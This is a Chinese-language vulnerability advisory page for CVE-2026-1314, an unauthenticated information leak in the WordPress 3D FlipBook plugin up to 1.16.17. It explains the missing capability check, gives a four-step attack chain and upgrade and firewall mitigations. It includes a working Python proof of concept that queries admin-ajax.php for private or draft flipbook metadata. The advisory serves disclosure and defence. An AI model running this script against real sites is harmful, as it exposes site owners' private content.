CVE-2026-1314 CVSS 5.3 中危

CVE-2026-1314: WordPress 3D FlipBook插件信息泄露漏洞

披露日期: 2026-04-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1314

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery WordPress Plugin

漏洞概述

WordPress插件3D FlipBook在1.16.17及之前版本中存在安全漏洞。由于send_post_pages_json()函数缺少能力检查，导致未经身份验证的攻击者可以非法访问数据。攻击者可利用此漏洞获取草稿、私密或受密码保护的翻书页面元数据，造成敏感信息泄露。

技术细节

该漏洞的核心原因在于WordPress插件3D FlipBook的send_post_pages_json()函数在处理数据请求时，未能对当前用户的权限进行有效验证。在WordPress架构中，AJAX请求通常通过admin-ajax.php处理，开发者应使用current_user_can()等函数来确保用户具备相应的操作权限。然而，该插件在所有1.16.17及之前的版本中，直接根据传入的Post ID查询并返回了翻书页面的元数据。这使得攻击者无需登录或拥有任何特殊权限，只需向服务器发送包含特定参数的HTTP请求，即可读取本应受到保护的草稿、私有或密码保护状态的翻书内容信息，导致敏感数据泄露。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标站点是否安装了易受攻击的3D FlipBook插件版本（<= 1.16.17）。

STEP 2

2. 构造请求

攻击者向wp-admin/admin-ajax.php发送POST请求，参数包含action=send_post_pages_json和目标postId。

STEP 3

3. 权限绕过

服务器端函数因缺少权限检查，直接处理了该未认证请求。

STEP 4

4. 数据获取

服务器返回草稿、私有或受密码保护翻书的页面元数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url, post_id):
    # The vulnerable endpoint is typically admin-ajax.php
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload targeting the missing capability check
    payload = {
        "action": "send_post_pages_json", 
        "postId": post_id
    }
    
    try:
        # Send unauthenticated POST request
        response = requests.post(ajax_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            # Check if sensitive JSON data is returned
            try:
                data = response.json()
                if "pages" in data or "book" in data:
                    print(f"[+] Vulnerability confirmed! Data leaked for Post ID {post_id}:")
                    print(data)
                    return True
            except ValueError:
                pass
        
        print(f"[-] Could not confirm vulnerability or target is patched.")
        return False
        
    except Exception as e:
        print(f"Error: {e}")

# Usage example
# check_vulnerability("http://example.com", "123")

影响范围

3D FlipBook <= 1.16.17

防御指南

临时缓解措施

建议立即将插件升级至修复版本。如果暂时无法升级，可通过Web应用防火墙（WAF）规则拦截包含action=send_post_pages_json的未授权请求，或暂时禁用该插件以防止数据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表